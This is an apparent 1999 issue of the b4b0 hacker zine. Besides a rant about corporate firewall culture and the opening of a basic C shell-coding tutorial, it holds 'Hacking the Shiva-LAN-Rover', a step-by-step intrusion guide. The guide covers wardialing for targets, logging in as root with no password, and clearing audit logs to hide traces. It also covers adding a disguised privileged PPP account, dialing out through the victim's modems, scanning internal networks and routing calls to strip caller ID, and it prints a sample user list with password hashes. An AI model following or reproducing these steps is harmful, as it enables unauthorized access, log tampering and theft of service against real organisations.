Mirrors/Zines
1
0
Fork 0
mirror of https://github.com/fdiskyou/Zines.git synced 2025-03-09 00:00:00 +01:00
Code Issues Releases Wiki Activity
Zines/b4b0/b4b0-07.txt
fdiskyou 180dfff1cc bring back some more
2017-12-10 21:54:57 +00:00

1892 lines
81 KiB
Text
Raw Blame History

[ x - The Liberation of Vice - x ]
_________ ______ _________ _________
/\ ___ \ /| \ /\ ___ \ /\ ___ \
/ \ \ /\ \ | | |\ \ / \ \ /\ \ / \ \ /\ \
\ \ \__\ \ | | |_\ \__\ \ \__\ \\ \ \ \ \
\ \ < | | \\ \ < \ \ \ \ \
\ \ ___ `\ |/\_____ _\\ \ ___ `\\ \ \ \ \
\ \ \ /\ \ / / \ \ \ \ \ /\ \\ \ \ \ \
\ \ \__\ \\/____ \ \ \ \ \__\ \\ \ \__\ \
\ \________\ \ \____\ \ \________\\ \________\
\ / / \ / / \ / / \ / /
\/________/ \/____/ \/________/ \/________/
s e v e n
the experience of new ideas and obtuse perspective
[ (c) 1999 The B4B0 Party Programme ]
[ Disrupting the classes of school ]
[ teachers around the world. ]
[TABLE OF CONTENTS]
(01). Introduction - [ph1x]
(02). Hacking the Shiva-Lan-Rover - [Hybrid]
(03). Womper Language Interpretor - [chrak]
(04). My Day in Age - [Rhinestone Cowboy]
(05). Coding a Shell From the Ground Up - [ph1x]
(06). The Art of Writing Shell Code - [smiler]
(07). The Telephone System/Network Part 1 - [pabell]
(08). Revolution Against the Catholic Church - [schemerz]
(09). bsaver.c Overview - [cp4kt]
(10). Conclusion - [ph1x]
Additional pieces included in this issue of b4b0 are...
[ bouncer.c ] ----------> intruderx
[ bsaver.c ] -----------> comp4ct and qytpo
[ carp.c ] -------------> comp4ct
[ carriers.txt ] -------> comp4ct
[ encrypt.c ] ----------> tragen
[ fbsd.tgz ] -----------> icesk
[ gh-cgi.c ] -----------> fred
[ misc.zip ] -----------> milcrat
[ w00f.c ] -------------> cossack and smiler
. -- ---b-4-b-0--r-e-v-o-l-u-t-i-o-n-a-r-i-e-z--- -- -
|
| ph1x ----------- -----> the chosen one
: jsb4ch ---- --- -------> the undecided one
. t1p ------- --------> acclaimed b4b0 admin
gr1p ----- -- - -------> he whose accent slays
. j\ ------ -- ---- -----> the freezing wonder
chr4k ----- ------ ----> the one who operates with a blown mind
comp4ct --- ------ ----> he whom claims to be a b4b0 saint
. p4bell ---- ------ ----> the one called the golden child
coss4ck ---------------> the one of proclamation
sm1ler ----------------> he who is emotionally content
. -- ---b-4-b-0--w-r-i-t-e-r-s--a-n-d--o-t-h-e-r--p-e-r-v-e-r-t-s--- -- -
|
| icesk emf zayten
: pG schemerz jnz
Hybrid assem polder
. Qytpo e- rhinestone cowboy
samj
.
--- Official IRC channel -> Efnet / #!b4b0 (not #b4b0)
--- Most Idiotic Site Ever -> http://www.anticode.com
--- Irc Chick of the Month -> MostHated
--- Greets to -> #!animalcrackers, rhino9, samj's mom, duke,
horizon, LJ & Falon, HNN, those who have helped
us and that we forgot about *sorry*, chixy and
miah of the netcis crew (some of us started
there!), and the NRA
--- Interesting Fact -> The now Irc fad of saying "HEH" was invented
in #b4b0. So we must require you to say the
following when using HEH:
<somenick> HEH (c) b4b0 1999
--- P.S. -> We need more supporters who will write things
for us other than inetd backdoors. Submit your
article/code/remarks/ascii submissions@b4b0.org
- -- ---> interesting <--- -- -
-- -- > http://www.babousa.org - baltimore academy for behavioral optometry
-- -- > http://www.babo.com - best gossip in korea!
-- -- > http://www.babo.com.au - babo morganti and partners
-- -- > http://www.babo.net - those wacky germans
-- -- > http://www.babo.org.uk - british association of balloon operators
-- -- > http://www.alvo.com/tvbabo - babo tv
-- -- > http://www.valhallabrewing.com/dboard/babo2000.htm - bay area brew-off
-------------------------------------------------------------------------------
!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!
-------------------------------------------------------------------------------
Greatest movie of all time, "Gummo":
I walked into the fruit market today, the clerk thought I was some out of
town hick. "Those apples will be 2 dollars a piece." He tells me. This is
where I outsmarted him. I hand him a 5 dollar bill, and just as he's handing
me a dollar change, I say... "keep it, were even." On the way out, I stepped
on a grape.
******************************************************************************
[INTRODUCTION]
******************************************************************************
We have had several people who have taken charge as editor for this issue,
but have not followed through with there responsibilities. Therefore, me
(ph1x) the unreliable drug addict has been chosen to get all of the
submissions together and put together a nice issue with good quality reading
material. I have miraculously managed to do so, so read to your hearts desire,
and enjoy this issue. HEH!
PS. I apologize for the extreme lateness of this issue, it's just
that jsbach *cough* I mean... various people said they were
going to write articles, and never did. =)
-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
<b4b0!b4b0!b4b0> Hacking the Shiva-LAN-Rover System <b4b0!b4b0!b4b0>
-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
By Hybrid (th0rn@coldmail.com)
April 1999
Contents:
1. Introduction
2. What can Shiva lan rovers do?
3. The command line
4. System security
5. PPP
1. Introduction
Shiva systems are becoming increasingly popular in the LAN networking world.
If like me you have done quite alot of scanning you would have come accross a
login prompt similar to this: [@ Userid:] If you have never seen this before,
take a look at some of the 9x scans at www2.dope.org/9x. In this file I am
going to fokus on the security strengths and weaknesses of the ShivaLanRover
networking system, and give a general overview of what can be done with such
systems. The Shiva system is a network security problem in it's own right, in
the sense that once you have gained access to one of these platforms, you
have the opotunity to explore the entire network on which the system is
based, in essance, you are on the trusted side of the firewall. If you would
like a copy of the ShivaLanRover software just FTP to ftp.shiva.com or get it
via the WWW.
To find a Shiva, the first thing you should do is dust off that old wardialer
program, and start scanning local or toll-free prefix assignments, if you
can't do this, you suck, go away. You will know when you have found a Shiva
when you are confronted with the following prompt:
@ Userid:
or if Radius authentification is enabled:
Starting Radius Authentification....
@ Userid:
Blah, ignore the radius authentification thing for now, it's just a lame
attempt to make the system look as if it has been secured, in most cases the
sysamin would have missconfigured the authentification and you will be
supprised as to how easy it is to get in. So you are at the login prompt,
what next? - As in most OS's Shivas have a nice set of default logins, so the
sysadmins poor setup is your gain. Try this: login: <root> pass: <NO PASS>.
The root login will work 9 times out of 10. The reason that the root account
works alot is beacuse in some cases the admin is not even aware the account
even exists! Most of the system setup is done via the main terminal, so the
admin does'nt have to login. the root account is not listed in the userfile
database, so most admin's overlook it. In some cases the admin would have set
up there own acount with somthing like <admin> <password> but if the admin
has any common sense you will not get in with that. Like most OS's, Shiva
systems have an audit log, so don't sit there trying to brute force anything,
once you are in, you can clear the system log, but more on that later. OK,
you've found a Shiva, you've loged on as <root> <no password>, now what? -
read on.
Once logged in, you will be droped into the Shiva command line prompt, which
should look somthing like this:
Shiva LanRover/8E, Patch 4.5.4p6 98/06/09 (Version and type of Shiva)
ShivaLanRover/8E# (The command prompt. Can be configured to say anything)
To get a list of the available commands type <help> or <?> this will reveal a
menu similar to this:
ShivaLanRover/8E# ? <enter>
alert Send text alert to all dial-in users
busy-out line <number> Busy-out serial line modem
clear <keyword> Reset part of the system
comment Enter a comment into the log
configure Enter a configuration session
connect <port pool> Connect to a shared serial port
crashdump Write crashblock to log
disable Disable privileges
help List of available commands
initialize <keyword> Reinitialize part of the system
lan-to-lan <keyword> Manage LAN-to-LAN connections
passwd Change password
ping <IP host> Send ICMP echo to IP host
ppp Start a PPP session
quit Quit from shell
reboot Schedule reboot
show <keyword> Information commands, type "show ?" for list
slip Start a SLIP session
telnet <IP host> Start a Telnet session
testline Test a line
The first thing you should do is check to see who is online, at the # prompt
use the show command to reveal the list of current online users:
ShivaLanRover/8E# show users <enter>
Line User Activity Idle/Limit Up/Limit
1 jsmith PPP 0/ 10 0/ None
2 root shell 0/ 10 0/ None
Total users: 2
So here we see ourselves loged in on line 2, and a PPP user on line 1. Note
that most of the time users are not configured to be allowed remote dialin
PPP access, so the user jsmith is probably at a terminal on the LAN. Now you
can see who is online, ie- check the admin is not loged in. Now you need to
get a rough idea of the size of the system and it's network. At the # prompt
type:
ShivaLanRover/8E# show lines <enter>
Async Lines:
Line State Rate/P/Stop/ RA|DCD|DSR|DTR|RTS|CTS|Fr errs| Overruns|PErrs
1 IDLE 57600/N/ 1/ |OFF|ON |on |on |ON | 0| 0| 0
2 CHAR 57600/N/ 1/ |ON |ON |on |on |ON | 2| 0| 0
3 IDLE 57600/N/ 1/ |OFF|ON |on |on |ON | 0| 0| 0
4 IDLE 57600/N/ 1/ |OFF|ON |on |on |ON | 0| 0| 0
5 IDLE 57600/N/ 1/ |OFF|OFF|on |on |OFF| 0| 0| 0
6 IDLE 115200/N/ 1/ |OFF|ON |on |on |ON | 0| 0| 0
7 IDLE 57600/N/ 1/ |OFF|ON |on |on |ON | 0| 0| 0
8 IDLE 115200/N/ 1/ |OFF|ON |on |on |ON | 0| 0| 0
Here we see a list of the modem ports, as you can see it has 8, this is about
average for most Shiva systems. So now we know how many serial lines there
are, we need to get a rough idea as to how big the network itself is, to do
this type:
ShivaLanRover/8E# show arp <enter>
Protocol Address Age Hardware Addr Type Interface
Internet 208.122.87.6 4m x0-x0-B0-2x-Dx-78 ARPA Ethernet:IP
Internet 208.122.87.4 4m AA-0x-x4-00-0C-04 ARPA Ethernet:IP
Internet 208.122.87.5 4m Ax-00-04-0x-xD-x4 ARPA Ethernet:IP
Internet 208.122.86.4 10m AA-x0-04-00-0C-04 ARPA Ethernet:IP
Internet 208.122.86.40 0m AA-00-04-00-x1-04 ARPA Ethernet:IP
Internet 208.122.86.147 4m 00-80-5x-31-F8-Ax ARPA Ethernet:IP
Internet 208.122.86.145 4m 00-80-5x-FE-C9-x8 ARPA Ethernet:IP
Internet 208.122.86.200 0m 00-x0-A3-xF-21-C8 ARPA Ethernet:IP
Internet 208.122.86.51 4m 00-x0-B0-01-36-3x ARPA Ethernet:IP
Showing the arp cache reveals some of the connected boxes to the LAN, aswell
as ethernet address, and type of protocol. Now we have established the kind
of system we are on, it's time to do some exploring, which is where I shall
begin this text file.
2. What can Shiva lan rovers do?
Shiva LanRover systems are very big security weaknesses if installed on any
network. The reason for this is that some of the default settings can be
easily overlooked by the admin. A Shiva system can be configured to provide
a wide variety of network services, some of which are listed here:
PPP (point-to-point protocol) This is the key to gaining access to the
network on which the Shiva is based upon, in most cases the network will have
an internal DNS server, and if you are lucky, the network which the system is
based will be connected to the internet. Hint hint, PPP, toll-free. But just
using a Shiva for free net access would be boring, which is why I am going to
discuss the other features of Shivas.
Modem Outdial. In alot of cases the system would have been configured to
allow modem outdialing which can be good for calling BBS's, diverting to
other dialups, scanning, but again, this is lame, just using a Shiva for
modem outdialing is boring, use your imagination. If you manage to get a PPP
connection, and the system is net connected, you could get online, and at the
same time call your favourite BBS. I'll explain how to do all of this later.
Telnet, ping, traceroute etc. These are the command line tools which will
enable you to determine whether the system is connected to the internet or
not. More on this later.
It's time to go into detail about all of the Shivas functions and commands, I
will concentrate on what you can do with root access, because that is the
only account you are likely to gain access to.
3. The command line
When loged into the Shiva shell, you have the following commands at your
disposal:
alert (Send text alert to all dial-in users) - Self explanitory.
busy-out uart <call-interface> (Busy-out UART port)
clear <keyword> (Reset part of the system)
The clear command is a nice feature of the Shiva system. The first thing you
should do when on a Shiva is make sure you erase all logs of your commands
and login times etc.. to do this all you need to do is type <clear log> This
will erase and reset the audit log, and also any invalid logins to the Shiva.
There are also other clear commands such as <clear arp> etc, but these will
all cause system problems and get you noticed, best leave this alone for the
time being.
comment (Enter a comment into the log)
configure (Enter a configuration session)
Heres the part where you can get the system to do what you want it to do, ie-
to get a PPP connection you will need to set up another account with shell
and PPP privalages. The root account does not allow PPP connections, so here
is where you will need to do your stuff. To get anywhere with a Shiva you
need to create a new account, using the config command you can create a new
user account with greater privalges than root. Before you make a new account
it is a good idea to see what kind of setup the other accounts have on the
system, you don't want to make an account that will stick out from the other
accounts, so type:
show security <enter> (this gives a list of the security configuration and
the user list.) you should see somthing like this:
[UserOptions]
PWAttempts=0
ARARoamingDelimiter=@
ExpireDays=30
GraceLogins=6
[Users]
admin=/di/do/rt/pw/sh/pwd=hH8FU4gBxJNMMRQ0yhj5ILUbaS/ml=3/fail=1/time=425
jsmith=/di/pw/pwd=.b9BJFBhuA1vuqFa9s8KBlxmngZ/ml=2/time=897646052
mjones=/di/pw/pwd=kRaOhlyT7CKMBldLVBVbektbCE/ml=2/fail=5/time=897646052
user911=/di/pw/pwd=7Xkq8TOwB4juRI51OHkDVVos8S/ml=2/time=910919159
another=/di/pw/pwd=YhzD6KBUB7Lh2iKKKSWxuR0gx7S/ml=2/fail=7/time=90767094|9
jadmams=/di/pw/pwd=ET0OhPyT7CyMBldLLKVbektbCE/ml=2/time=902262821
msmith=/di/pw/pwd=sDV1Jxo8QJncIRcl9eoVO6SKBE/ml=2/time=897646052
dsmith=/di/pw/pwd=pv8OhPyT45CyMBldLSKVbektbCE/ml=2/time=897646052
padacks=/di/pw/pwd=HoDVw5MqTM*oTL69tBehqt7tiS/ml=2/time=897646052/grace=1
ljohnson=/di/pw/pwd=r.y9NJbrCWKfsSeu9FbfJpAIzZ/ml=2/time=897646052
Here we get a list of the configured users on the system. As you can see the
admin has made him/herself their own account, while other users have accounts
that allow logins via their terminals, but not remotely. In the above example
all the users have been assigned passwords, so it would be a good idea when
you make your own account to have one aswell. The idea is to make an account
that will blend in with the others and not look to obvious. The passwords in
the external user list are all 3DES (triple DES) encrypted. The type of user
account set up is determined by the options, such as jsmith=/di/do etc, more
on these functions in a bit. OK, now we need to set up our own account, to do
this we need to enter a configuration session, at the command line prompt
type: ShivaLanRover/8E# config <enter>
You will then drop into the configuration session.
Enter configuration file lines. Edit using:
^X, ^U clear line
^H, DEL delete one character
^W delete one word
^R retype line
Start by entering section header in square brackets []
Finish by entering ^D or ^Z on a new line.
config> (here is where you enter the config commands, to make you own account
do the follwing)
config> [users]
config> username=/di/do/sh/tp/pw
config> ^D <------ (type control D to finish)
Review configuration changes [y/n]? y
New configuration parameters:
[users]
username=/di/do/sh/tp/pw
Modify the existing configuration [y/n]? y
You may need to reboot for all changed parameters to take effect.
You've just created your own user account which you can use for PPP
connections etc. To begin with your account is un-passworded, so when you log
back in just hit enter for your password, you can later change this. The /sh
part of the user configuration means you can remotely log into the command
shell, /pw means you have the ability to define your own password, if you
wanted to give yourself another root account, you would use the switch /rt.
In combination with the show config command you can also alter other system
configurations via this method, although it is a very good idea not to
alter anything. Now your account has been set up, all you do is re-connect to
the system and login as your username, more on this later.
connect <PhoneGroup pool> (Connect to a serial port or modem)
This is another one of the good features of Shivas, you can remotely control
a series of modems on the system, and in alot of cases dialout. If you want
to call a BBS, note you cannot upload using Zmodem or similar protocols,
although you would be able to download, but expect a few CRC checksum errors.
To connect to a modem type: connect all_ports <enter> you will then drop into
one of the modem pools, as follows:
Connecting to Serial2 at 115200 BPS.
Escape character is CTRL-^ (30).
Type the escape character followed by C to get back,
or followed by ? to see other options.
(here basic modem commands are nessasary, use the follwing to dialout)
ATZ (initialise modem)
ATDTxxxxxxxxx (atdt then phone number) note in some cases the modem outdial
with be based upon the system PBX, so sometimes you will have to figure out
the outdialing code, which should be somthing simple like dialing a 9 before
the number you want to connect to. To disconnect from the outdialing session
type control C, or ^C. This will take you back to the command line. As with
the other system events, outdialing is loged into the audit file, along with
the number you called. It is generaly a good idea to clear the audit log
after things like PPP or dialout, again just type clear log <enter>.
cping <IP host> (Send continuous ICMP echoes to IP host)
crashdump (Write crashblock to log)
detect (Detect the configuration of an interface)
disable (Disable your root privaleges)
dmc <keyword> (Information commands, type "dmc ?" for list)
down <slot> <firstmodem> (last Remove modems from CCB pool)
info <slot> <modem> (Print info for specified modem)
mupdate <slot> <firstmodem> (l Update Rockwell modem FW)
state (Print state of a modem)
status (Print status of all modems)
trace (Trace message passing)
up <slot> <firstmodem> (lastmo Add modems to CCB pool)
test_1slot <slot> (Tests DMC card in slot specified)
test_allcards (Tests all DMC cards found in system)
test_golden <golden slot> (Tests all DMC cards against a Golden DMC)
test_loopall <count 0-99> (Tests All DMC's for count)
test_modempair <slot1> (modem1 Tests modems against each other)
test_slotpair <slot1> <slot2> (Tests a DMC card against another)
test_xmitloop <s> <m> <s> <m> (Tests modem pair for count)
help (List of available commands)
history (List of previous commands)
initialize <keyword> (Reinitialize part of the system)
l2f <keyword> (L2F commands)
close <nickname> (Close tunnel to L2F HG)
login (Start L2F session)
tunnels (Show open tunnels)
lan-to-lan <keyword> (Manage LAN-to-LAN connections)
passwd (Change password)
ping <IP host> (Send ICMP echo to IP host)
ppp (Start a PPP session)
quit (Quit from shell)
reboot (Schedule reboot)
route <protocol> (Modify a protocol routing table)
rlogin <IP host> (Start an rlogin session)
show <keyword> (Information commands, type "show ?" for list)
show+
account <keyword> (Accounting information)
arp (ARP cache)
bridge <keyword> (Bridging information)
buffers (Buffer usage)
configuration (Stored configuration, may specify sections)
the show config command will reveal all the system configuration setups,
includings DNS server information, security configurations, IP routing etc.
It will also show the internal IPs of radius authentification and TACAS
servers.
show+
finger (Current user status)
interfaces [name1 [name2 ... ] (Interface information)
ip <keyword> (Internet Protocol information, type "show ip ?" for list)
To get an idea of the routing information, and again how big the network is
type, show ip route. This will bring up a routing table, and again give you
an idea as to where the connected boxes are, it is a good idea to note the IP
prefixes.
show+
lan-to-lan (LAN-to-LAN connections)
license (Licensing information)
lines (Serial line information)
log (Log buffer)
The show log command will display the system audit log in more format. Here
you will be able to see what is going on on the system, ie- is it primarily
used for PPP, dialout etc. If users use the system for outdialing, you can
even see the numbers that they dial. Here is a cut down example as to what
you wiuld see in a system log file:
Mon 15 16:24:29 GMT 1998 4530 Serial4: "krad" logged in
00:01 4531 Serial4:PPP: Received LCP Code Reject for code 0D
00:01 4532 Serial4:PPP: Received PPP Protocol Reject for IPXCP (802B)
00:00 4533 Serial4:PPP:IP address xx.xx.xx.xx dest xx.xx.xx.xx bcast
00:00 4534 Serial4:PPP: IPCP layer up
00:04 4535 Serial4:PPP: CCP layer up
14:09 4536 Serial4:PPP: IPCP layer down
00:00 4537 Serial4:PPP: CCP layer down
00:00 4538 Serial4:PPP: LCP layer down
00:01 4539 Serial4:PPP: CD dropped on connection
00:00 4540 Serial4: "krad" logged out: user exit after 14:17 (Dial-In PPP,)
00:06 4541 Serial4: Rate 115200bps
00:00 4542 Serial4: Modem string 'AT&FW1&C1&D3&K3&Q5&S1%C3\N3S95=47S0=1&W'
00:01 4543 Serial4: Initialized modem
04:56 4544 setting time of day from real-time clock to Wed Nov 25 16:43:44
18:27 4545 Serial4: New Dial-In session
00:00 4546 Serial4:PPP: LCP layer up
00:00 4547 Serial4: "krad" logged in
00:01 4548 Serial4:PPP: Received LCP Code Reject for code 0C
00:00 4549 Dialin:IPX configured net 9823O049
00:00 4550 Serial4:PPP: IPXCP layer up
00:00 4670 Serial4: New Command Shell session
00:03 4671 Serial4: "root" logged in
01:38 4672 Serial4: "root" logged out: user exit after 01:42 (Command Shell)
00:06 4673 Serial4: Rate 115200bps
00:01 4674 Serial4: Modem string 'AT&FW1&C1&D3&K3&Q5&S1%C3\N3S95=47S0=1&W'
00:00 4675 Serial4: Initialized modem
55:11 4676 Could not parse IP SNMP request.
In the system log, you will also see invalid login attempts, error messages,
and general system events. Because the log file logs everything, it is a good
idea to erase your own presence in it.
show+
modem <keyword> (Internal modem information, type "show modem ?" for list)
netbeui <keyword> (NetBeui information, type "show netbeui ?" for list)
novell <keyword> (NetWare information, type "show novell ?" for list)
ppp (PPP multilink bundles and links)
processes (Active system processes)
security (Internal userlist)
semaphores (Active system semaphores)
slot <keyword> (Internal serial slot information, type "show slot ?" for list)
upload (Upload information)
users (Current users of system)
version (General system information, also shows DNS info)
virtual-connections (Virtual Connection information)
slip (Start a SLIP session)
telnet <IP host> (Start a Telnet session)
tftp (Download new image, ie- system config files)
tunnel <IP host> (Start a Tunnel session)
wan [action] <wan interface> (Perform actions on WAN Interface)
4. System security
Shivas can be very weak on security, due to the exposed root account. If the
system is configured properly they can be very secure systems, although this
is usually not the case. There are many security options for the Shiva system
including Radius Authentification, SecurID, TACAS, and just the standard
secured login. In some cases an admin will use a secondary server to act as
the Radius Authentification. In this case, the setup would look somthing like
this.
[RADIUS Authentification Server] } The server contains a secured user
| list, which will be used to verify
| login requests. The login is
[Router] determined if the user can be
| | verified by the server.
| | } The Shiva sends the login request to RADIUS.
[Shiva System] } Starting Radius Authentification... @ Userid:
Sometimes a system will be configured to work with a number of different
Shivas on a network. For example, using the same idea as above, but without
the Radius server, a secondary shiva may be installed to act as the security
server, whereas all other Shiva systems refer to it for user login
verification. This can be a real bitch if you have loged into a system, but
the above setup has been implemented. For example, say you loged in as root,
and you want to set up a PPP account. The first thing you would do is check
to see what kind of setup existing users have by typing <show security> If
the verification server has been setup, there will be no users in the user
list, instead you have to find the network location of the verification
server, and hope it has an un-passworded root account on it. To find the
verification srever, or primary Shiva, just use the show config command. you
can then telnet from the Shiva you are on, to the Shiva displayed in the
config file, you should then get the @ Userid: login screen again, try root
no pass, if this does not work, it is possible to temorarily configure your
own server on the network, but this would mean other users will not be able
to login, so leave this alone. If you do manage to login to the server as
root, you have to setup your user account there, because that is where all
the Shivas on the network refer to in order to verify users, this way the
admin only has to maintain one user configuration file.
5. PPP
Once you have setup a user account with shell and PPP privaleges, you can
begin exploring the network on which the Shiva is based upon. If the network
is net connected you can get free net access aswell, but this is quite risky,
especially if the admin notices PPP sessions active at 4am, with destinations
such as irc.ais.net:6667. When you first establish a PPP connection to a
Shiva server, the first thing you should do is map out the network. To do
this just run a network, or port scanner accross the domain which the Shiva
is on. As on most networks, you are likely to come accross a variety of
different boxes, such as UNIX boxes, SunOS, shared printers, mail servers,
cisco routers, in one case someone I know found an Amiga box@$!. If the
network is net connected, it is a good idea to use your shell for any net
connections, such as IRC. Once you have an external net connection from a
Shiva it is also possible to similtaniously dialout accross the PSTN to a BBS
or any other system. To do this, you would have to find the network address
of the Shiva server you are on, then telnet back to it and re-login. using
the <connect all_ports> command will give you control over the system modems,
then you can dialout as if you where in terminal mode. If the Shiva you are
on is located on a toll-free number, or even local, it is not a good idea to
use it for net access, or stay on it for a long time. If you must use a Shiva
for net access, it is a good idea to use your PSTN routing skills, and not
dialup to the system directly. The mistake people make when it comes to ANI,
or CLID is that they think only 800 numbers have ANI, and residential numbers
have CLID. This is *wrong* the ANI service can be setup by anyone, it's a
choice, not a standard. If you want to route your call, the best thing to do
is route internationaly, so your origionating clid gets striped at intralata
boundarys on the PSTN. A technique, which I don't wanna give out involves
trunk and carrier hoping. We'll thats about it for this file, hope you
enjoyed it. If you want more information on the Shiva Lan Rover system, just
check out shiva.com, they will have technical guides in pdf format, you can
also download the shiva software from their ftp site.
Shouts to the following:
[9x] substance phriend siezer vectorx statd
blotter knight network specialK microdot
katkiller xramlrak bosplaya deadsoul and
nino the 9x g1mp.
[b4b0] gr1p t1p. #9x #darkcyde Efnet.
backa xio.
[D4RKCYDE] downtime elf zomba force mortis
angel dohboy brakis alphavax
tonekilla bishopofhell sintax
digitalfokus mistress.
-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
<b4b0!b4b0!b4b0> Womper Language Interpretor, by chrak <b4b0!b4b0!b4b0>
-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
This is a neat language interepor by chrak, that is still in developement.
Check out /w0mper, and make sure to read Example.sh to see a set of example
code.
* NOTE * this isn't quite finished and hopefully chrak will come through
with more releases. Thank you.
-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
<b4b0!b4b0!b4b0> My day in Age, by Rhinestone Cowboy <!b4b0!b4b0!b4b0>
-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
I had an epiphany the other day. It wasn't the kind of flash of
insight that makes you shave your head, move to the desert, and change
your name to something that sounds like an astronomical phenomena, but
I do think it's something that other people need to hear. You see, I
am a professional consultant, and with this project, I became a man.
I was tasked with building a firewall for a healthcare facility. This
wasn't very difficult, and, apart from the planning phases and alot of
mostly useless meetings, it got built in a day or two. All the exceptions
were put in place, and the LAN was protected to a dgree to which it
had never been protected before. All was right with the world...
... Until the client got involved. It started with a simple request.
"Could you please open up telnet services in the firewall to this one
particular Solaris box? We have a few outside consultants who need to
get into that box so they can work remotley. In particular, we have a
user from an educational facility who needs remote root access."
I objected, of course, but I was then informed that it was the
opinion of the IS staff, that this was an "acceptable risk." This wasn't
an opinion that could be justified by anyone, especially after they
shelled out countless thousands of dollars on a "network security solution".
It got a little worse, of course. About a week later, I uncovered a
bug in there web front end to their database. Instead of praise, I got
what I should have expected, exchanges like the following:
"Only people who subscribe to this database should have access. Now you
are telling me that ANYONE on the net can get this data for free? What
the hell is that firewall doing?"
"The firewall is doing it's job. The problem is that your web app. Never
asked me for anything like a password. It just gave me access. It
really wasn't complicated at all. A fireall simply cannot fix your buggy
software.
"Firewalls make computers secure. This computer isn't secure. Obviously,
the fireall you made, doesnt work."
He just didn't get it. I would have been more then happy to spend the
time to audit all the machines individually, apply the proper patches,
and fix any configuration errors that may rear their ugly heads, if the
client was willing to pay for my time. Hell, i'd even work hard!
Unfortunatley, the client didn't want to hear that. He wanted his "magic
bullet, " and if I wasnt willing to provide it, he'd hire another consulting
company to do it.
It then occurred to me, that this senario is being played out all
over the net, and it's alot bigger then I had previously realized. I was
playing a part, so was the IS director, so was my company, and so was the
firewall.
Corporate America is all about "covering your ass." No one wants
accountability for anything. If bullshit and 'passing the buck' were the
keys to world domination, the USA would be the world's only super power.
Wait, never mind...
Anyway, this is what hit me. Firewalls do alot more then filter
packets and give IS gimps a warm fuzzy feeling when they go home at night.
Firewalls manage to almost universally remove any traces of accountability
in corporate security. As in the above example, if, I mean when, someone
sniffs the root password and usese it to compromise the LAN, the IS depart-
ment can pretend that they weren't at fault. They can pass the buck to me
or my company. Fortunatley, there is a contract protecting us from lawsuits
of that nature. If necessary, the buck can even be passed, either by my
company or the clients, to the vendor. Even they can pass the buck, since
any rational person would realize that they weren't involved in this
morass.
The myth of the "fireawall as a magic bullet" is some of the most
useful bullshit ever spun. It allows everyone to sleep easier at night
and make alot of money. Of course, the buck ultimately stops getting
passed by another piece of bullshit, the myth of "the genius hacker." I'm
not saying that there aren't some genuinely brilliant people breaking into
computers these days, but chances are they aren't relying on a 5 year old
sniffer running on a SunOS 4.1.3 box in an .edu site, which is silly
enough to have a guessable NIS mapname.
The world is very broken. We have security products that either
simply don't work, don't work up to the impossible expectations put on them
, or even introduce furthur holes in hosts and networks they are suppose
to be protecting. We also have a world of corperate IS managers, mostly
incompetent "security consultants", and talentless bullshit artists
who manage to social engineer their way into six figure incomes because
they are "reformed hackers."
It would be nice if some kind of messiah of the computer age were to
come along and make it all better. Unfortunately, that's not going to
happen. If there was such a person, we'd either nail him to a cross or he
would opt for the huge paycheck which comes with playing a part in the
system. I suspect I have finally entered into adult life, because I have
little or no desire to change an awfuld system that I can not fix. There
are quite a bit of rewards for being as corrupt as everyone else. So here
is the choice facing us all, either sit down at the table of corruption
and shared guilt and get paid alot (basically sell out) or fight a
hopeless battle against American corporate culture. I think adulthood is
really choosing to play in the "bullshit playground" with the rest of
the grownups. Today, I am a man.
Rhinestone Cowboy
-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
<b4b0!b4b0!b4b0> Coding a Shell from the Ground Up, by ph1x <b4b0!b4b0!b4b0>
-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
This article I am going to discuss what a shell is, how a shell works
and were going to build a shell from the ground up.
For all source were going to be writing today, we will need b4b0shell.h
included below.
Let's get started. A shell is a program that does command
interpretation. A shell can also be reffered to as a command processor,
as most DOS users know. It reads input, then executes the command.
The execution of a command, is basically creating a child process for
the execution. For example, the shell will fork() a child process to
execute the command. The parent (the shell) will then wait for its child
to finish before it reads another command. Before we start coding, make
sure your using the following header file in all of your codez.
/**********************************/
/* Header file for the b4b0 shell */
/* Extrapolated from ush.h, and */
/* added onto. ph1x@b4b0.org */
/**********************************/
/*
NOTE: We won't be making use of this whole header file today
our shell is not going to have the complexity of your
standard unix shell that you use from a daily to daily
basis.
*/
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <sys/wait.h>
#include <limits.h>
#define STDMODE 0600
#define DELIMITERSET " ><|&" // we are only going to add redirection to
// our shell, not background or pipe support
#ifndef MAX_CANON
#define MAX_CANON 256
#endif
#define TRUE 1
#define FALSE 0
#define BLANK_STRING " "
#define PROMPT_STRING "b4b0$"
#define QUIT_STRING "quit"
#define BACK_STRING "&" // for background process
#define PIPE_STRING "|" // pipe support
#define NEWLINE_STRING "\n"
#define IN_REDIRECT_SYMBOL '<' //redirection
#define OUT_REDIRECT_SYMBOL '>' // symbols
#define NULL_SYMBOL '\0'
#define PIPE_SYMBOL '|'
#define BACK_SYMBOL '&'
#define NEWLINE_SYMBOL '\n'
int makeargv(char *s, char *delimiters, char ***argvp);
int parsefile(char *inbuf, char delimiter, char **v); // this will return
// the token following delimiter if its present in *s.
int redirect(char *infilename, char *outfilename); // performs redirection
int connectpipeline(char *cmd, int frontfd[], int backfd[]);
/*************************-=EOF=-******************************/
First we will write an extremely basic command interpreter,
just for you to get a basic idea as to how a shell calls
a child process to execute commands, and for you to experiment
with.
---------------------------bsh v1.0-----------------------------------
